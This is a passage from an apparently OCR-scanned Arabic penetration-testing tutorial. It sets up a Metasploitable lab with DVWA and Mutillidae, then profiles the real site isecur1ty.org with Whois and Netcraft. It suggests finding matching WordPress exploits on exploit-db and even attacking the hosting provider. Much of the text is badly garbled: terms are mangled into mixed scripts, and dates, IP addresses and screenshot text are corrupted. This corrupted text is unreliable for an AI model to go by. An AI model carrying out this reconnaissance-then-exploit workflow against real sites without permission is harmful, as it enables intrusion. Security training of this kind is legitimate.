سنرسلها (إذا كانت مكتوبة بلغة جافا أو بلغة يفهمها الخادم) على الخادم وليس على جهاز الحاسوب 
الخاص بنا. لذلك» سوف يتيح لنا الوصول إلى الخادم وليس للشخص الذي وصل إلى هذا الخادم. 


من ناحية أخرى» تستخدم بعض مواقع الويب أمأً©4۷8Sل»‏ وهي لغة من جانب العميل. إذا تمكنا من 
العثور على موقع ويب يتيح لنا تشغيل شفرة أم۲٥4۷85ل»‏ فسيتم تنفيذ الرمز بواسطة العملاء. على 
الرغم من آنه قد يتم حقن الرمز في خادم الويب» إلا أنه سيتم تنفيذه من جانب العميل» وسيسمج لنا بتنفيذ 
هجمات على جهاز الحاسوب العميل وليس على الخادم. وبالتالي» من المهم للغاية التمييز بين لغة العميل 
واللغة من جانب الخادم. 
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الهجوم على مواقع الويب Attacking a Website‏ 
سنناقش في هذا القسم مهاجمة موقع ويب. لمهاجمة المواقع» لدينا طريقتان: 


٠‏ يمكننا استخدام أساليب مهاجمة طريقة موقع الويب التي تعلمناها حتى الآن. نظرًا لأننا نعرف أن 
موقعًا إلكترونيًا مثبتا على جهاز حاسوب» يمكننا محاولة مهاجمته واختراقه تماما مثل أي حاسوب 
آخر. ومع ذلك» فإننا نعلم أن موقع الويب مثبت على جهاز حاسوب» يمكننا محاولة مهاجمته 
والتطفل عليه تماما مثل أي حاسوب آخر. يمكننا أيضًا استخدام الهجمات من جانب الخادم لمعرفة 
أي نظام التشغيل أو خادم الويب أو التطبيقات الأخرى المثبتة. إذا وجدنا أي نقاط ضعف» فيمكننا 
استخدام أي منها للوصول إلى الحاسوب. 

ه هناك طريقة أخرى للهجوم وهي الهجمات من جانب العميل. لأن المواقع تتم إدارتها وصيانتها 
بواسطة البشر. هذا يعني أنه إذا تمكنا من اختراق أي من مسؤولي الموقع» فربما نتمكن من 
الحصول على اسم المستخدم وكلمة المرور الخاصة بهم» ومن هناك تسجيل الدخول إلى لوحة 
المشرف الخاصة بهم أو إلى 55۳1) .)Secure Socket Se‏ ثم سنکون قادرین على الوصول 
إلى أي من الخوادم التي يستخدمونها لإدارة الموقع. 


إذا فشلت كلتا الطريقتين» فيمكننا محاولة اختبار تطبيق الويب» لأنه مجرد تطبيق مثبت على هذا الموقع. 
لذلك» قد لا يكون هدفنا هو تطبيق الويب» وريما يكون هدفنا مجرد استخدام هذا الموقع» ولكن جهاز 
الحاسوب الخاص به يتعذر الوصول إليه. بدلا من ذلك» يمكننا الانتقال إلى موقع الويب» والاختراق في 
الموقع» ومن هناك نذهب إلى الشخص المستهدف. 

جميع الأجهزة والتطبيقات مترابطةء ويمكننا استخدام أحدها لصالحنا ومن ثم شق طريقنا إلى حاسوب آخر 
أو إلى مكان آخر. في هذا القسم» بدلا من التركيز على الهجمات من جانب العميل والخادم» سنتعرف 
على اختبار أمان تطبيق الويب نفسه. 

سوف نستخدم آلة هاطها اموه كجهازنا المستهدف» وإذا قمنا بتشغيل الأمر وا؟٣هء؟ا»‏ فسنرى أن 
عنوان ۴| الخاص به هو 10.0.2.4ء كما هو موضح في لقطة الشاشة التالية: 


TIA] 


sfadminBnetasploitable: § 1fconf 1g 
:thÛ Link encap:Ethernet HlNaddr OB:O00:Z7:5f :131:0c 
inet addr:10.0.2.4 Bcast:l0.O0.Z2.255 Mask: 25.205. 0 
inet addr: fed0: :all0:Zriff :feSf :414Û0c#64 Scope :Link 
UP BROADCAST RUNNING MULTICAST MTU:150d0 Metric :1 
RA packets:B15 errors: dropped: overruns: frane :0 
TX packets:350 errors: dropped: overruns: carrler :0 
collisions: txqueue len : 1000 
HX bytes:31391 (BI. KB) TX bytes:4b6b6B (41.60 KB} 
Base address :xdO010 Memory :f OO0O0O0OOO0-f OOZOOODD 


Link encap:Local Loopback 

inet addr :llf?.O0.0.1 Mask: .O0.0.0 

inetb addr: ::1#12Z8 Scope :Host 

UP LOOPBACK RUNNING MTU:1I6436 Metric :1 

RA packets :380 errors: dropped: overruns: frane :0 
T# packets :366 errors: dropped: overruns: carrler :0 
collisions: txqueue len : 0 

RX bytes:455381 (4441.7 KB) TX bytes:455381 (444.7 RB} 


إذا نظرنا داخل المجلد »/۷/8۲/۷W۷W‏ فيمكننا مشاهدة جميع ملفات موقع الويب المخزنة» كما هو موضح 
في لقطة الشاشة التالية: 


sfadmin®nmnetasploltable: %Ş ls #uar#uuu#/ 
ا‎ index.php phpinfo.php test Ltikiwuik1-old 


ywua mut1ll1dae phpMyfîdn 1n tikliwlkl tuilki 


في لقطة الشاشة أعلاهء يمكننا أن نرى أن لدينا صفحة mutillidae ş, dvwa liıدl, «phpinfo.php‏ 
و Ad‏ ممم. الآن» إذا ذهبنا إلى أي جهاز على نفس الشبكةء وحاولنا فتح المتصفح والانتقال إلى 
0.0.4 فسنرى أن لدينا موقع ويب خاص ب 8ا0هاهام ة6 كما هو موضح في لقطة الشاشة 
المحددة. موقع الويب هو مجرد تطبيق مثبت على متصفح الويب» ويمكننا الوصول إلى أي من مواقع 
الويب الخاصة ب ع اطه†أهامكهاه“ واستخدامها لاختبار أمانها: 
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/ Metasploitable 2 - Linux * أ‎ + 
¢ |© | 4 


E] Most Visited» ff Offensive Security “, Kali Linux “ Kali Docs “™, Kali Tools 


Warning: Never expose this VM to an untrusted network! 
Contact: msfdev [at ]jmetasploilt . com 


Loqin with msfadmin/msfadmin to qet started 


e TWiki 

e phpMyAdmin 
e Mutillidae 

e DVWA 

e WebDAV 


الان سوف نلقي نظرة على صفحة 0۷۷۷۸. يتطلب اسم المستخدم کمسؤول وكلمة مرور لتسجيل الدخول. 
بمجرد إدخال بيانات الاعتماد هذه» يمكننا تسجيل الدخول إليهاء كما هو موضح في لقطة الشاشة التالية: 


C@ | jQ Search tO ¥ > 


¢ |) © & | 10.0.2.4/dvwa/login.php 
E Most Visited v Offensive Security Kali Linux Kali Docs % Kali Tools & Exploit-DB @ Aircrack-ng ™ Kali Forums ™ NetHunter Kali Training @ Getting Started 


DUA) 


Username 


admin 


Login 


۰ ]127[ 


بمجرد تسجيل الدخول» يمكننا تعديل إعدادات الأمان باستخدام علامة تبويب ا5861 0۷۷۷۸ كما 


هو موضح في لقطة الشاشة التالية: 


EEE DVWA Security € 


Instructions 
Setup | Script Security 


Security Level iS currently high. 


Brute Force 
You can set the security level to low, medium or high. 
Command Execution 


CSRF 


The security level changes the vulnerability level of DWA. 
| nigh YY | Submit | 


SYL Injection 
SQL Injection [Blind] PHPIDS 
Upload 
v.O0.6 (PHP-Intrusion Detection System) is a security layer for PHP based web applications. 
As2 reflected 
ASS stored 
PHPIDS is currently disabled. | ] 


_Dvwn security ___ U 1-1 
PHP Info 
About 


Logout 


You can enable PHPIDS across this site for the duration of your session. 


Username: admin 
Security Level: high 
PHPIDS: disabled 


ضمن علامة التبویب 5٥٥۷1۲۷‏ 0۷/۷۸ سنقوم بتعیین C٣١ 5٥٥1/۲۷‏ علی مستوی منخفض 
والنقر على 'إرسال" (آ"u0ء):‏ 


DVWA Security € 


Script SecurIty 
Security Level IS currently high. 
You can Set the security level to low, medium or high. 


The security level changes the vulnerability level of DWA. 


| IOY ي‎ | | 2 UUDmMIt 
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سنبقيها منخفضة کے القسم القادم. نظرًا لان هده مجرد دورة تمهيدية» سنتحدث ففط عن الطريقة السا 
لاکتشاف ٹغرات تطبیق الویب فی کل من تطبیق ویب 0۷۷۸ ر 1€ ااناں. 


إذا ذهبنا إلى تطبيق الويب ٠ه‏ ااا بنفس الطريقة التي وصلنا إليها من تطبيق الويب 0۷۷۷۸ 
يجب أن نتأكد من ضبط مستوى الأمان الخاص بنا على 0ء كما هو موضح في لقطة الشاشة التالية: 


® Mutillidae: Born to be Hacked 
Version: 2.1.19 


Home Login/Register Toggle Hints 


Hints: Disabled (O0 - I try harder) Not Logged In 
Toggle Security Reset DB View Log View Captured Data 


Mutillidae: Deliberately Vulnerable PHP Scripts Of 
OWASP Top 10 


OWASP Top 10 ظ‎ 


Latest Version / Installation 


e Latest Version 

e Installation Instructions 

e Usage Instructions 

e Get rid of those pesky PHP errors 
e Change Log 


o> e Notes‏ ے 


Ess ..quality- Samurai WTF and Backtrack contains all the tools needed or you may build your own collection 
tested with Samurai 
WTF, Backtrack, ¬ 
Firefox, Burp-Suite, ع‎ th 
Netcat, and these 
Mozilla Add-ons backljtrack 


ظط 


@webpwnized 


Mutillidae 
Channel 


يمكننا تبديل مستوى الأمان من خلال النقر على خيار تبديل الأمان على الصفحة: 


Version: 2.1.19 Security Level: O0 (Hosed) Hints: Disabled (O0 - | try harder) Not Logged In 


Home Login/Register Toggle Hints Toggle Security Reset DB View Log View Captured Data 


[IAI] TTT TTT 
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في هذا القسم» سنناقش العديد من التقنيات لجمع المعلومات حول Whois Lookup ءslدختwlڊ Jnl‏ 
وNetcra‏ و >teطR0.‏ ثم سنرى كيف يمكننا مهاجمة خادم عن طريق استهداف مواقع الويب التي ينم 
استضافتها على هذا الخادم. بالانتقال إلى قسم جمع المعلومات» سنتعرف على النطاق الفرعي وكيف 
يمكن أن تكون مفيدة لتنفيذ الهجمات. سنبحث لاحقًا عن ملفات على النظام الهدف لجمع بعض المعلومات 
وأيضًا تحليل هذه البيانات. 


الآنء سنفعل جمع المعلومات قبل أن نبد في محاولة للاستغلال. لذلك» سنقوم بجمع أكبر قدر ممكن من 
المعلومات حول عنوان | للهدف» والتكنولوجيا المستخدمة على موقع الويب» ومعلومات اسم المجالء 
ولغة البرمجة المستخدمةء ونوع الخادم المثبت عليه» وما هو نوع قاعدة البيانات المستخدمة. سنقوم بجمع 
معلومات الشركة وسجلات NS‏ الخاصة بها. سنرى أيضًا نطاقات فرعية غير مرئية لأشخاص آخرين› 
ويمكننا أيضًا العثور على أي ملفات غير مدرجة. الآن يمكننا استخدام أي من أدوات جمع المعلومات 
التي استخدمناها من قبل» على سبيل المتال» يمكننا استخدام ٥9ا12‏ وادراج كيان فقط كموقع ويب› 
وبدء تشغيل الإجراءات. يمكننا أيضًا استخدام ۳3ء أو حتى ه٥5٠0م×6".‏ واختبار البنية التحتية 
للموقع ومعرفة المعلومات التي يمكننا جمعها من ذلك. سيغطي هذا القسم المواضيع التالية: 

Whois بحث‎ 

Netcraft 6 


RobteX< 6 


جمع المعلومات من مواقع الهدف 


AFI] TTT TTT 
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Whois Lookup | Whois بحث‎ 


في هذا القسم» سنلقي نظرة على بحث ءأه"/. إنه بروتوكول يستخدم للعثور على مالكي موارد الإنترنت› 
على سبيل المثال» مجال أو خادم أو عنوان .|١‏ في هذاء نحن لسنا قراصنة في الواقع» نحن فقط نسترد 
المعلومات من قاعدة بيانات حول مالكي الأشياء على شبكة الإنترنت. على سبيل المثال» إذا أردنا تسجيل 
اسم نطاق متل 2410.٥0۳‏ يتعين علينا تقديم معلومات عن الشخص الذي يفقوم بتسجيل الدخول مثل 
العنوان» ثم سيتم تخزين اسم النطاق باسمنا وسيشاهد الناس أن زيد يملك اسم المجال. هذا هو كل ما 


إذا قمنا ببحث كا۷ على ءاوه 0و» فسنرى الكثير من مواقع الويب التي تقدم الخدمات› لذلك سنستخدم 
«http://whois.domaintools.com‏ وأدخل اسم نطاقنا المستھدف ک و١۲٥.‏ 1۲٥٥ء‏ واضغط على 
زر البحث كما هو مبين في لقطة الشاشة التالية: 


Whois LOOKUP 


في لقطة الشاشة التاليةء يمكننا أن نرى أننا حصلنا على الكثير من المعلومات حول موقعنا المستهدف: 


marca 


=— Domain Profile 
Registrant Lountry UWS 


Registrar Go Lhina Domains, LLC 
lANA ID: 1149 
URL: http www. gochinadomains.com 
Whois Server: whois.godaddy.com 
abuse @ godaddy .com 
(p}) 14806242505 


Registrar Status client DeleteProhibited, clientRenewProhibited, clientlransferProhibited, 
clientllpdateProhibited 


Dates 2,026 days old 
Lreated on 2010-10-20 
Expires on 2018-10-20 
LWUpdated on 2017-09-16 


Name Servers NSS? DOMAINCONTROL. COM [has 5O0 039 241 domains] 
NSZ7O DOMAINCONTEOL. COM [has 5O0 039 241 domains] 


Tech Contact 


IP Address 0.63.22. dA - 411,498 other sites hosted on this server 

IP Location Eî - Arizona - Scottsdale - Godaddy.com Llc 

ASN AS26496 A5-26496-GO-DADDY-LOM-LLC - GoDaddy.com, LLL, US (registered Oct Û01, 
200 2( 

Domain Status Registered And Active Website 

IP History 42# changes on 42 unique IP addresses over 13 years 

Hosting History 18 changes on 11 unique name servers over 11 years 


يمكننا أن نرى عنوان البريد الإلكتروني الذي يمكننا استخدامه للاتصال بمعلومات اسم المجال. عاد 
سنكون قادرين على رؤية عنوان الشركة الذي سجل اسم النطاق» ولكن يمكننا أن نرى أن هذه الشركة 
تستخدم الخصوصية في مجالها. إذا كانت الشركة لا تستخدم أي خصوصية» فسنكون قادرين على رؤية 
عناوينهم والعديد من المعلومات حول الشركة الفعلية. 

يمكننا أن نرى متى تم إنشاء اسم المجال» ويمكننا أيضًا رؤية عنوان ۴| الخاص ب 9١٥.۷اأ٣©۵ء|.‏ إذا 
قمنا باختبار اتصال اء يجب أن نحصل على نفس عنوان ۴| كما هو مذكور في لقطة الشاشة التالية. 


ذا قمنا بتشغیل ۷W. 5٥٥1۲ /.0۲9g‏ 9g٣ام»‏ فسیتم إرجاع نفس عنوان ۴|: 


L: Isers?p1ng www. 1secur1 ty. org 


Pinging 1secur1ity.org [SH.63.2H2. 32| with 32 bytes of data: 
Reply from SH.b63.2B2. 32: bytes=32 t1ime=2b4a4ms TIL=%53 
Reply from SH.b63.22. 32: bytes=32 t1ime=26dms TIL=%53 


في لقطة الشاشة السابقةء يمكننا رؤية موقع |١‏ وحالة النطاق» ويمكننا أيضًا الوصول إلى السجل» لكننا 


بحاجة إلى التسجيل لذلك. الآن» مرة أخرى يمكننا استخدام هذه المعلومات للعثور على استغلالات. 


في لقطة الشاشة التاليةء في سجل اه۷ يمكننا العثور على مزيد من المعلومات حول الشركة التي 
سجلت هذا المجال (۸أ2"٣0ك):‏ 
Whois Record ( last updated on 20180716 ]‏ 


Domain Name: ISECURITY .ORG 

Registry Domain ID: D1640456846- LROR 

Registrar WHOIS Server: whois.godaddy. com 

Registrar URL: http://www. gochinadomains .com 

Updated Date: 28417-809-16716:43:808Z 

Creation Date: 2818-10-24714:30: 12Z 

Registry Expiry Date: 2018-14-280714:38:127 

Reeistrar Registration Expiration Date: 

Registrar: Go China Domains, LLC 

Registrar IANA ID: 11439 

Registrar Abuse Contact Email: 3DUse(@godaddy.com 

Registrar Abuse Contact Phane: +1.4886242585 

Reseller: 

Domain Status: clilentDeleteProhibited https:/ficann.orgfepp#clientDeleteProhibited 
Domain Status: clientRenewProhibited https:/fficann.org/fepp#clientRenewProhibited 
Domain Status: clientTransferProhibited https:7//icann.org/epp#clientTransferProhibited 
Domain Status: clientlUpdateProhibited https:/ficann.org/fepp#c lientUpdateProhibited 
Registrant Organization: 

Registrant State/Province: New York 

Registrant Country: US 

Name Server: NS63. DOMAINCONT ROL . CON 

Name Server: NS7@. DOMAINCONTROL . CON 

ODNSSEC: unsigned 

URL of the ICANN Whois Inaccuracy Complaint Form: https://www. icann.org/wicf/ 

»>*» Last update of WHOIS database: 2013-47-16715:48:29Z <<< 


For more information on Whois status codes, please visit https:f/icann.org/epp 


Access to Public Interest Registry WHOIS information is provided to assist persons in 
determining the contents of a domain name registration record in the Public Interest Registr 
ر‎ 

registry database. The data in this record 1s provided by Public Interest Registry for 
informational purposes only, and Public Interest Registry does not guarantee its accuracy. 
This service is intended only for query-based access. You agree that you will use this data 
anly for lawful purposes and that, under no circumstances will you use this data to a) allo 


TIS TTT TTT 


هذه معلومات أساسية» لكنها مفيدة للغاية على المدى الطويل» فقط لمعرفة ماهية عنوان ۴| الخاص بهم 
وما هو هدفنا وما هي الخدمات التي يستخدمونها. يمكننا أن نرى خادم الاسم الذي يتم استخدامهء ويمكننا 


أيضًا رؤية الشركة التي يتم توفيرها بها. 
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NetcraftL | Netcraft 


في هذا القسم» سنتعلم كيفية الحصول على معلومات حول التقنيات التي تستخدمها المواقع الإلكترونية 
المستهدفة. للقيام بذلك» سنستخدم موقع ويب يسمى aa «(Netcraft (https://www.netCraf.©C0‹™‏ 
سنضع العنوان الهدف» واختر هدفنا ك و١1۲1۷.0ا٥ع5!ء‏ وانقر على السهم ك يظهر في لقطة الشاشة 
التاأبة: 


What's that site runnıIng? 


Find out what technologles are powering 
any website: 


isecurlty.orq 


بعد ذلك» انقر فوق (أ٣0م‏ ۸6 ا5) كما هو موضح في لقطة الشاشة التالية: 


Results for isecur1ty.org 


Found 3 sites 


Site Site Report First seen Netblock Os 
1.  vıww.isecurlty.org &( april 2003 unknovın linux - centos 
2. roadmap.isecurlty.org ا&‎ January 2017 digitalocean london linux - centos 
3. isecurlty.org &( april 2003 unknovın unknovın 


COPYRIGHT © NETCRAFT LTD 20138. ALL RIGHTS RESERVED. 
في لقطة الشاشة المحددة» يمكننا أن نرى بعض المعلومات الأساسية مثل عنوان الموقع ورتبة الموقع‎ 


E PTT EAE 


3 Background 


Site title |58۲1 | مجتمع ريي لكر ات خقلی‎ Date first seen April 2003 

Site rank 180268 Primary Arabic 
language 

Description "33120513302541 33025213312051 330271 (AO AFB 3N A61 SIO AST B31 212 


(3312041331204331 20 7133024733120331 
EENIFETIEEILFUNLIEEUIWEEIEEUIVELIEEINEUEIEENIELTI EES ESIYEE 
"3312101330256330 A250 330261133024 7330241 (33024733 IN AO 33025533 TAOS SION AANAIINA1A 330 A51 
(331212 330A (331203331 A21 330262 (330A 7133 N2033 1211 (33120533 N2013 3120733121033 1205 
(330247330256330 A52330 25033024 7330261 

EEE TAC ESI FUNEIRENIVETAEEULFELIEENIWEFIREUL FIS EEIUVEYAEKESA UFR EEA VANIKEUIVESIEEIFETACERNVSFAEE IFET 
1330243330256330 2503302471330261 (33024733 (AOS IONASTN A1205 330 A4 BIT A12330 251 


Keywords Not Praesent 


Netcraft Risk 110 
Rating [FAQ] 


AFI] TTT TTT 


عنا التمرير لأسفل» ر يمكننا رؤية موقع الويب نفسه والمجال وعنوان IP‏ ومسجل النطاق» وهي الشركة 
التي سجلت المجال ل ۲1۷ 1ا٥هيا:‏ 


5 Network 


Site http://www.isecur1ty.org Netblock Owner Digital Ocean, Inc. 
Domain isecur1ty.org Nameserver ns1.digitalocean.com 
IP address 46.101.29.109 DNS admin hostmaster@isecur1ty. org 
IPv6 address Not Present Reverse DNS unknown 
Domain pir.org Nameserver whois.networksolutions. com 
registrar organisation 
Organisation Domain Protection Services, Inc., US Hosting DigitalOcean 
company 
Top Level Organization entities (.org) DNS Security unknown 
Domain Extensions 


Hosting country EE UK 
|٥۷۲1 في لقطة الشاشة السابقة» عادة ما نرى معلومات عن المنظمة»ء لكن هناء لا يمكننا ذلك لأن‎ 
يستخدم حماية الخصوصية. عادة» يجب أن نكون قادرين على رؤية هذه المعلومات وأكثر من ذلك.‎ 
في لقطة الشاشة السابقةء يمكننا أن نرى أنها مستضافة في المملكة المتحدةء ويمكننا أيضًا رؤية اسم‎ 
«ns1 .digitalocea¬.ءc0" الخادم» وهو ١0٥.2۸ءء٥0|اهااواك. 1ء١ ومرة أخرى» إذا انتقلنا إلى‎ 
فسوف نكتشف أن هذا هو موقع على شبكة الإنترنت لاستضافة المواقع.‎ 
الآن» نحن نعرف أن هذه شركة استضافة ويب» وفي أسوأً السيناريوهات» يمكننا استخدام هذا أو محاولة‎ 
.|5۴٥۷۲1۷ نفسها للوصول إلى‎ ۸51.diوأه|0‎ ٥۴2۸.٥0۳ اختراق‎ 
إذا انتقلنا لأسفل» فسنرى سجل الاستضافة للشركات المضيفة التي تستخدم. يمكننا أن نرى أن أحدث‎ 
2.2.31 وهو الخادم نفسه الذي رأیناه و في القسم السابق»ء‎ Apc اا مع‎ ٣۷× واحد یعمل علی نظام‎ 
مع اSئئ_0۵" ×١لا وجميع الوظائف الإضافية الأخرى:‎ 
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= Hosting History 


Netblock owner IP address J5 Web server Last 
seen 
Refresh 
Digital Ocean, Inc. 46.101.29.109 Linux Apachef2.2.15 Centûs 7-Jul- 
18 
LeasewWeb Netherlands EB. 5.7040748 Linux Apachef2.2.31 Unix mod_sslf2.2.31 OpenSSL/1.0.18- 18-May- 
fips mod_bwlimited/ 1.4 mod_fcgid/2.3.9 2017 
unknown 41.217.73.140 Linux Apachef2.2.31 Unix mod_sslf2.2.31 OpenSSL/1.0.18- 4-Novw- 
fips mod_bwlimited/1.4 mod_fcgid/2.3.9 2015 
LeaseWeb Netherlands B.V, 45.211.1650.142 Linux Dimofinf Hosting 24-0 - 
25 
unknown 41.217.73.140 Linux Dimofinf Hosting 2 8-J ul- 
15 
LeasewWeb Netherlands BE. 495.211.108.174 Linux Apache 13-May- 
215 
Leaseweb Netherlands BEB. 945.211.108.166 Linux Apache 18-Mar- 
25 
unknown 45.211.48.169 Linux Dimofinf Hosting 2 5-May- 
2014 
Cloudflare, Inc. 101 Townsend Street 5an 108.162.194.116 unknown cloudflare-nginx 15-Feb- 
Francisco CA US 94107 2013 
SaftLayer Technologies Inc. 1950 N Stemmons 74.53.2 260.138 Linux Apache A 5-Mar- 
Freeway Dallas TX US 75207 2012 


مرة أخرى» يعد هذا أمرّا مهمًا للغاية للعثور على عمليات الاستغلال ونقاط الضعف على جهاز الحاسوب 


بالتمرير لأسفل إلى مسارات التتبع على الويب» سيّْظهر لنا تطبيقات الطرف الثالث المستخدمة على 
هدفناء» حتى نتمكن من رؤية أن هدفنا يستخدم × «2×٤0‏ و eاوەەق‏ وخدمات ءاو0ه الأخرى. قد 


يساعدنا ذلك أيضًا في العثور على الحاسوب الهدف والوصول إليه كما هو موضح في لقطة الشاشة 


aE 


3 Web Trackers 


wWab Trackers are third-party resources loaded onto a webpages. Trackable resources include social sharing widgets, javascript files, and images. 


These trackers can be used to monitor individual user behaviour across the web. Data derived from these trackers are primarily used for advertising 
or analytics purposes, 


Categories 


® CDN (4) 
© Widget (4) 


Analytics ( 1] 


Popular Sites with this Tracker 

WWW, ZOUQIA QF, HWH, COMSS.TU, Www. traf fboost. net 

www. dailykos.com, www.barchart.com, www.adelaldenow.com .all 
www. tUumMblr com, www.meteofrance,com, www.chip.de 

www, voirfilms.ws, video. foxnews.com, lastpass.com 

www.dell.com, www.helse. de, www.cnn.com 

www, businessinsider.com, Www.owasp.org, www.foxnews.COmM 

www. onlinevideoconverter.com, www.cybrary.it, www.zerohedgqe.com 
www. linuıxquestions.org, www.dhnet.be, www.lavanguardia. com 


www. liveleak.com, www.mcafee. com, www.newser. com 


© coogle (4) 

@ MaxCDN (2) 
AddThis (1) 
Amazon (1) 


@ SshareThis (1] 


Tracker 
Addthis 
amazans3 
Google Analytics 
Googlecdn 
Googleplus 
Googlewidget 
Baotstrapcdn 
Maxcdn 


ShareThis 


9 known trackers were identified. 


Companies 


Primary Category 
Widget 

LDN 

Analytics 

LDN 

Widget 


LON 


Widget 


Lompany ا‎ 
AddThis & 
Amazon f 


Google & 


MaxCDN f 


SshareThis f 


توضح لنا علامة التبويب 9۷٥ا٥‏ ٣٣ء۴‏ التقنيات المستخدمة على المواقع الإلكترونية المستهدفة: 


= Site Technology 


Fetched on 1st July 


Application Servers 


An application server is a server that providss software applications vith ssrvices such as security, data services, transaction support, load balancing, and managsrment of large distributed systems, 


Popular sites using this technology 
vw imagsbam,.com, vwiw.s3blog.org, 
wren, mathworks,com 


wer taqesschau.de, vari. majorgeeaks,com, 
veri, businassinsider cam 


Description 


No description 


Web server softeare 


Technology 
CentOS Û 


Apache 


server-side 


Includes all the main technologies that Netcraft detects as running on the server such as PHP, 


Popular sites using this technology 
vene, laqUipEe.fr, weve leparisian,fr, vrei woirfilms.ws 


vere, repu bblica.it, vewevi widens, com, virri, heise, de 


Description 


FHF is supported and/or running 


Na description 


A cryptographic protocol providing communication security ower the Internet twitter.com, sellercertral.amazon.com, 


kayakoreport, hostasaurus,com 


rw, barchart.com, eer, bom.gow.au, php.net 


Serwer supports PHP 


Technology 
PHP ğ 

AMAL 

551L 


PHP Enabled f 


Client-Side 


Includas all the main technalagias that run an tha browser [such as JavaScript and Adobe Flash}. 


Popular sites using this technology 


vS PN. COM, vrei, yahoo.com, g0.micrasoft,.corm 


Description 


Na description 


Widely-supparted programming language cammanly used to power client-side dynamic content on 


vabsites 


Technology 
Asynchronous Javascript 
JavaScript 


Client-Side Scripting Frameworks 


Framevıarks or libraries allows for easier development of applications by providing an Application Program Interface [APT] or a methodology to follow whilst developing. 


Popular sites using this technology 


Description 


A JawaŠcript library used to simplify the client-side scripting of HTML wee CÎSCO, COM, wwe, t-online.de, wewwr.sfrfr 


Google API to retrieve JavaScript libraries 


wre fOxNEYS. COM, www.google.com, wrerw.google, it 


ven wrilderssecurîty.com, wevreı.zerohedgqe,com, 
ve SANS Or 


vv ansa, ik, rv. metflis.com, ev O1inest,caom 


Technology 
JQuery 
Google Hosted Libraries 


Font Awesome Web Fonts Na description 


Eoatstrap Javascript Library No description 
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في لقطة الشاشة أعلاهء يمكننا أن نرى أنه يستخدم خادم الويب 18٥4م۸.‏ على جانب الخادم» يمكننا 


أن نرى أن موقع الويب يستخدم »۶۳١۶‏ مما يعني أن موقع الويب يمكنه فهم وتشغيل كود .۴۳١۴‏ في 
المستقبل» إذا تمكنا من تشغيل أي نوع من الشفرات على هدفناء فیجب إرسال الرمز کرمز ۴۳۴. لإنشاء 
حمولات على اoi‌امsھ†Me‏ أو على ۸٥siھ۴۷-اا۷6»‏ یجب آن ننشئها بتنسیق ۲۳۴ وسیكون الموقع 
الإلكتروني المستهدف قادرا على تشغیلها لأنها تدعم .۴۳١۲۴‏ 


من جانب العميل» يمكننا أن نرى في لقطة الشاشة السابقة أن الموقع يدعم أمأ۲ ۷25هل لذلك إذا قمنا 
بتشغيل أم٥4۷45ل‏ على موقع الويب» فلن يتم تتفيذده على موقع الويب» فسيتم تتفيذه على جانب 
المستخدمين الذين يشاهدون مواقع الويب» لأن أمأ©۷88هل لغة من جانب العميل و ۴۳۴ جانب الخادم. 
إذا نجحنا في تشغيل شفرة ۴١۴‏ فسيتم تنفيذها على الخادم نفسه. إذا نجحنا في تشغيل م۲1 ٥2۷25لء‏ 
فسيتم تنفيذه على المستخدمين. هو نفسه 6۲۷لاا[. هذا مجرد إطارعمل لجافا سكريبت . 


في لقطة الشاشة التاليةء إذا كنا نتجه لأسفل« فإن الموقع يستخدم برnliج WordPress Self-‏ 


4هst.‏ ستظهر ٥٥۲4‏ أي تطبيقات ويب يتم استخدامها على الموقع الإلكتروني: 


Blog 
Blog software is software designed to simplify creating and maintaining weblogs. They are specialized content management systems that support the 
authoring, 2diting, and publishing of blog posts and comments, 


Technology Description Popular sites using this technology 


WordPress 5Self-Hosted @ Free and open source blogging tool and a content management system blogs.technet.microsoft.com, 
(CMS) based on PHP and MySQL (hosted independently) wordpress.com, sellercentral- 
europe.amazûon . com 


Content Delivery Network 
A content delivery network or content distribution network (CON) is a large distributed system of servers deployed in multiple data centers in the 
Internat. The goal of a CDN is to serve content to end-users with high availability and high performance. 


Technology Description Popular sites using this technology 


taoogle Hosted Libraries Google API to retrieve JavaScript libraries www, meteofra nce. COM, 
www.commentcamarche.net, 
www. iIfattoquotidiano. it 


PHP Application 


PHF is5 an opan source server-side scripting language designed for Web development to produce dynamic Web pages. 


Technology Description Popular sites using this technology 
WordPress f Free and open source blogging tool and a content management system www. news .COM.,AL, www,cybrary.it, 
(CMS; based on PHF and MySQL imagesrv,.adition.com 
RSS Feed 


RSS Rich Site Summary is a family of web feed formats used to publish frequently updated works such as blog entries, news headlines, audio, and 
wideo in a standardized format. 


Technology Description Popular sites using this technology 


RSS f Standardized web feed format used to publish frequently updated works www.dallykos.com, www.elmundo.es, 
wWwWw.Marca.CoOm 


[lA] TTT TT 


58 هو مجرد تطبيق ويب» لذلك يمكننا أن نرى مثالا آخر في حالتناء وهو تطبيق ويب مفتوح 
المصدر» قد يكون هناك الكثير من المواقع الأخرى. إذا كنا محظوظين بما يكفي لإيجاد موقع موجود» 
فيمكننا المضي قدمًا واستغلاله على موقع الويب المستهدف. على سبيل المثالء افترض أن لدينا 
«WordPress je ثحبl, /https://www.exploit-db.com ”lإ Iilaiil Il, WordPress‏ 
فسنتمكن من العثور على الكثير من عمليات الاستغلال المرتبطة ب ٣۲658‏ ۲Qه“.‏ 

هناك إصدارات مختلفة من وورد. نحتاج إلى التأكد من أن لدينا نفس عدد الإصدار الذي نستهدفه. سننظر 
إلى متال لمعرفة كيفية استخدام عمليات الاستغلال» ولكنه يوضح فقط مدى قوة جمع المعلومات. إذا 
مررنا مزيدًا من التمرير» فسنجد معلومات أخرى متل مواقع الويب التي تستخدم 1۲١1-5‏ و088 وجميع 
أنواع الأشياء كما هو موضح في لقطة الشاشة التالية: 


Doctype 


û Document Types Declaration, or DOCTYPE, is an instruction that associates a particular SGML or XML document (for example, a 
webpage) with a Document Type Definition {DTD}. 


Technology Description Popular sites using this technology 
HTMLS f Latest revision of the HTML standard, the main markup langllaqgêa www.google.com, www.facebook.com, 
on the web coinmarketcap.com 
CSS Usage 


Lascading Style Sheets (CSS) is a style sheet language used for describing the presentation semantics (the look and formatting) of a 
document written in a markup language (such as XHTML). 


Technology Description Popular sites using this technology 


External Styles defined within an external CSS file www .aMaAzZONn.COMm, www. bbc.co.uk, 
www, bbc,caom 


CSS Media Query No description www. microsoft.com, 
www .qoogleadservices.com, 
www.daillymail.co.uk 


Embedded & Styles defined within a webpage www .CisCO.COM, www.spiegqel.de, 
webshell.suite.office.com 


وبالتالي» يتم استخدام "6۲١١3‏ للتعرف على الموقع. قمنا بجمع المعلومات المتعلقة بالموقع الذي يتم 
